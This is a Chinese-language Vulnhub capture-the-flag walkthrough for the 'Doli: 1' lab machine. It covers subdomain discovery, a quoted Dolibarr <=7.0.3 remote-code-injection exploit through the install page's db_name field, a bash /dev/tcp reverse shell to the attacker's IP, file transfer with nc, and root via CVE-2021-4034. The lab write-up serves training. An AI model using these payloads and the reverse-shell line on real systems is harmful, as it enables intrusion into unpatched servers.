Vulnhub 靶机篇:Doli:1
## 0x01 靶机信息> - **名称**:doli: 1
> - **发布日期**:2021 年 7 月 5 日
> - **作者**:c3p0d4y
> - **系列**:doli
> - **难度**:困难
> - **简介**:您的老板告诉您对他们的新 ERP/CRM 软件进行快速渗透测试,该软件最近由初级开发人员安装和修改。你能发现开发者犯了哪些错误吗?当涉及到 Web 部件时,这台机器基于现实的参与。
> - **下载链接**:https://download.vulnhub.com/doli/doli-vulnhub-fixed.ova
> - **网络**:DHCP自动分配
## 0x02 Write-Up
### 2.1 信息获取
#### 2.1.1 主机扫描
目标机IP:192.168.181.164
使用nmap工具扫描
``` txt
nmap -sS -Pn -p- -A -T4 192.168.181.164
-sS 隐蔽扫描,-Pn 禁Ping,-p- 所有端口,-A 综合扫描,-T4 快速扫描
```
扫描出目标机开放了22和80端口
!(https://img-oss.hg021b.org/2024/6/e8d63e628914e80b438a55f4e9d93ac7.png)
访问网站显示默认页面,无其他信息
!(https://img-oss.hg021b.org/2024/6/86fbb56669fc54f0681a6841ad099946.png)
#### 2.1.2 使用Gobuster目录扫描
``` txt
gobuster dir -u http://192.168.181.164/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
dir目录模式,-u指定url,-w指定字典
```
目录扫描没有结果,考虑域名问题
!(https://img-oss.hg021b.org/2024/6/e7dfe9b14f1ed303905c1d1fe604540a.png)
查阅过后,发现vlunhub上少了一个提示
在/etc/hosts添加doli.thm解析(https://tryhackme.com/r/room/doli)
但是现在访问这个网站会发现这台机器已经被隐藏了
!(https://img-oss.hg021b.org/2024/6/4f4fafeb7445220941ea677e2e5ff13b.png)
添加解析到hosts文件
!(https://img-oss.hg021b.org/2024/6/b1f5be0068d6fe6e6c3612dd7cb8a900.png)
访问页面还是一样的,继续爆破
!(https://img-oss.hg021b.org/2024/6/00dcc08a0add98c1dda12f4c78e0cb5a.png)
#### 2.1.3 Gobuster爆破子域名
``` txt
gobuster vhost -u doli.thm -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --append-domain true
vhost虚拟主机模式,类似于dir的遍历,-w指定字典,--append-domain模式启用(用于增加前缀的遍历方式)
```
发现了erp.doli.thm
!(https://img-oss.hg021b.org/2024/6/15c120456d0df5e9c119ff2bbeae7d93.png)
添加至hosts并访问
!(https://img-oss.hg021b.org/2024/6/efae07b05ceb9d1311e2b80266729633.png)
!(https://img-oss.hg021b.org/2024/6/8d2388dde3f6a303b43c0185c3b3223a.png)
继续尝试目录遍历
``` txt
gobuster dir -u http://erp.doli.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,asp,md
dir模式 -u 指定url,-w指定字典,-x 指定后缀名
```
这次遍历有结果了,进行尝试
!(https://img-oss.hg021b.org/2024/6/3ada6dbae9b6ce79df9ed9841859e4fb.png)
登录界面(http://erp.doli.thm/document.php)
!(https://img-oss.hg021b.org/2024/6/b49e34ca1940799228ffdaa38a75e8b6.png)
访问notes.md
!(https://img-oss.hg021b.org/2024/6/c993479c5e927afed110b7f0ccd3313e.png)
``` txt
# ChangeLog
- Changed The Super-Admin Password To A Super Secure Random 15 Chars Passwd (Done)
- Crypt Saved Passwords Locally
- Add Firewall Rules And Allow Only UDP Incoming-Outcoming At Port 9110
- Add a lockfile (To do)
- Revert The Framework's Patch From 7.0.X To Prevent Conflitions With The Mod (To do)
翻译:
# 变更日志
- 将超级管理员密码更改为超级安全的随机 15 个字符密码(完成)
- 在本地加密保存的密码
- 添加防火墙规则并仅允许端口 9110 上的 UDP 传入-传出
- 添加锁定文件(待办事项)
- 从 7.0.X 恢复框架的补丁以防止与 Mod 发生冲突(待办事项)
```
从上面得知管理员密码是15个字符,框架是7.0.X
根据作者简介内写的,机器的web部分是采用现实的框架
根据软件名ERP/CRM来搜索得出Dolibarr
!(https://img-oss.hg021b.org/2024/6/ed45462f5267f10fa8688aa9e884a5ed.png)
#### 2.1.4 利用dolibarr框架漏洞
在kali内部搜索相关漏洞信息
``` txt
searchsploit dolibarr
```
发现相关的有两个
!(https://img-oss.hg021b.org/2024/6/9f9dead568df05ddacb71b667f53c413.png)
第二个尝试性较高,按照内容遍历一下相关目录
/install/step1.php
!(https://img-oss.hg021b.org/2024/6/d680f3af73cf49913b0072924cc77c2a.png)
``` txt
# Exploit Title: Unauthenticated Remote Code Evaluation in Dolibarr ERP CRM =<7.0.3
# Date: 06/29/2018
# Exploit Author: om3rcitak - https://omercitak.com
# Vendor Homepage: https://dolibarr.org
# Software Link: https://github.com/Dolibarr/dolibarr
# Version: =<7.0.3
# Tested on: Unix, Windows
## Technical Details
URL: http://{domain}/{dolibarr_path}/install/step1.php
Parameter Name: db_name
Parameter Type: POST
Attack Pattern: x\';system($_GET);//
## Steps to reproduce the behavior
- Go to fresh install page.
- Click "Next Step" button for create example config file (conf/conf.php)
- Send this request:
POST {dolibarr_path}/install/step1.php HTTP/1.1
Host: {domain}
testpost=ok&action=set&main_dir=C%3A%2FAmpps%2Fwww&main_data_dir=C%3A%2FAmpps%2Fwww%2Fdocuments&main_url=http%3A%2F%2Flocalhost+&db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F&db_type=mysqli&db_host=localhost&db_port=3306&db_prefix=llx_&db_create_database=on&db_user=root&db_pass=root&db_create_user=on&db_user_root=root&db_pass_root=root&selectlang=auto
- Visit url and run the command: `http://{domain}/{dolibarr_path}/install/check.php?cmd=cat /etc/passwd`
## Timeline
- 06/29/2018 18:30 - Found vulnerability.
- 06/29/2018 18:44 - Report vendor.
- 06/29/2018 20:38 - Vulnerability fixed by vendor.
GitHub Issue: https://github.com/Dolibarr/dolibarr/issues/9032
```
使用gobuster针对php文件遍历
``` txt
gobuster dir -u http://erp.doli.thm/install -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
```
发现疑似目录
!(https://img-oss.hg021b.org/2024/6/284f15442718cb18c8ea1107dd1f9c49.png)
根据漏洞文件内容,找到了Fresh install
!(https://img-oss.hg021b.org/2024/6/79efeeeea1d5407234b0204c6386138c.png)
不过开始之前需要配置kali的mysql服务
``` txt
systemctl start mysqld
启动mysql服务
```
!(https://img-oss.hg021b.org/2024/6/c5e37544e10dd03cb7975524c595e8b9.png)
允许root远程连接
``` mysql
use mysql;
使用mysql数据库
SELECT User, Password, Host FROM user;
查看数据库当前访问权限信息
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
允许root用户在任意地址访问所有资源,设置密码为root
FLUSH PRIVILEGES;
刷新权限
```
!(https://img-oss.hg021b.org/2024/6/293fb7e0521865f442319186a94a1cda.png)
然后开始配置安装
!(https://img-oss.hg021b.org/2024/6/d59d65b158386b864b0b126caa53651e.png)
使用burp截包,修改db_name参数
``` txt
db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F
```
!(https://img-oss.hg021b.org/2024/6/35231d918f3e9fb9bbede1e5cad52d04.png)
!(https://img-oss.hg021b.org/2024/6/4a58cf7c0b474b84d1c07a6c640d1560.png)
注入成功
``` txt
http://erp.doli.thm/install/Seth.php?cmd=whoami
```
!(https://img-oss.hg021b.org/2024/6/ca40479f7df85a4f0cef4e08d2807096.png)
#### 2.1.5 反弹shell
``` bash
nc -lvvp 5555
侦听5555端口
```
!(https://img-oss.hg021b.org/2024/6/ce37e6fdaf1e41c46a0c7e90f6dc0a1b.png)
使用‘+’替换空格,反弹成功
``` bash
bash+-c+'bash+-i+>%26+/dev/tcp/192.168.181.165/5555+0>%261'
```
!(https://img-oss.hg021b.org/2024/6/b18e2bf44473781713e98031cd97bf84.png)
查找sudo权限文件没有发现,在home目录下找到了三个用户(c3p0,m3dsec,ybenel)
!(https://img-oss.hg021b.org/2024/6/64d4cfa5df873467f0fb101d0ed7b775.png)
在opt目录下发现了stewie.el文件
!(https://img-oss.hg021b.org/2024/6/6f959b2ea9309678fdc578cc6fab32d6.png)
``` txt
(defun main ()
(print "VictoryShallBeMine!"))
(main)
翻译:
胜利就在我面前!
```
说明这个目录下应该有其他线索
把这个图片复制到install目录下,到浏览器查看
``` txt
cp ViewMe.png ~/dolibarr/htdocs/intsall/1.png
```
!(https://img-oss.hg021b.org/2024/6/d89675b64d3540c3663655dfae50027c.png)
图片内容是CITRIX,是一种编码格式,联想到notes.md中的(在本地加密保存的密码)
!(https://img-oss.hg021b.org/2024/6/9488d878632f9fdecbb2454bc7b1c1f1.png)
在playboos目录下有一个get_secrets文件,获取密码?
!(https://img-oss.hg021b.org/2024/6/a8eee7bd5746d577f1b40bc66f55c611.png)
查看日志文件,在nginx下发现了一个隐藏目录.bk
!(https://img-oss.hg021b.org/2024/6/fdd26ad35938b4a8ae4072a7f541f278.png)
查看access.log.bk文件,发现获取到一串数字,猜测是密码
``` txt
"GET /5455644852464247526b464a526b4e4254455a435155314752304651516b5a4653554e4453464243526b564a52304e45544564435245314652304a4c5155464754304646526b74425155593d HTTP/1.1"
```
!(https://img-oss.hg021b.org/2024/6/e3130f28ad60cfeddcdf16576231d5d9.png)
#### 2.1.6 使用CyberChef解码
拿到CyberChef,第一层16进制转换后,结果是base64编码
!(https://img-oss.hg021b.org/2024/6/6fd8c4c671b070ea6f89d042e53f5a60.png)
解码后浮现出citrix编码
!(https://img-oss.hg021b.org/2024/6/42870a84678f1b22ad20af0acb4cdde3.png)
解码显示密码:c3p0p4ssw0rd@@
!(https://img-oss.hg021b.org/2024/6/d353d5d1da5e03426156b5d0ff9a984b.png)
升级shell会话,尝试登录用户
``` bash
SHELL=/bin/bash script -q /dev/null
```
#### 2.1.7 提权用户c3p0
成功登录用户c3p0
!(https://img-oss.hg021b.org/2024/6/233393f9c99bf97b9fa6bd6b0b172275.png)
tnakt.jpg貌似损坏了,但在目录下的note.txt中发现一段话
``` txt
ybenel: i love using a dictionary or multiple dictionaries of words in order to create my passwords
翻译:
ybenel:我喜欢使用一本字典或多本单词字典来创建密码
```
!(https://img-oss.hg021b.org/2024/6/4388148e0647be4459bdf9d7d6febc82.png)
#### 2.1.8 使用linpeas脚本获取信息
暂时没有其他信息了
使用nc上传linpeas脚本跑一遍看看
```bash
nc -l 8888 > linpeas.sh
开启8888端口侦听,接收linpeas.sh
```
!(https://img-oss.hg021b.org/2024/6/b04729a9a14d8130eb896dc7fc421f0e.png)
``` bash
nc 192.168.181.164 8888 < linpeas.sh
向目标机IP的8888端口发送文件
```
!(https://img-oss.hg021b.org/2024/6/77543edba86b4b6d66e7c7d6b3fbcc0a.png)
传输成功,并给文件执行权限
``` bash
chmod +x linpeas.sh
```
!(https://img-oss.hg021b.org/2024/6/bfb9c6b37765aa3a1d488bf978192456.png)
#### 2.1.9 利用cve-2021-4034提权
可以看到扫描出很多漏洞信息,由于目标机没有gcc,尝试cve-2021-4034
!(https://img-oss.hg021b.org/2024/6/2d0b72837b81af20a9de333cb47e289c.png)
``` txt
https://github.com/dadvlingd/CVE-2021-4034
链接中下载python2脚本
使用之前的nc方式传输文件并执行
```
提权成功
!(https://img-oss.hg021b.org/2024/6/41377a18c6359e77f697c5896770bf64.png)
页:
[1]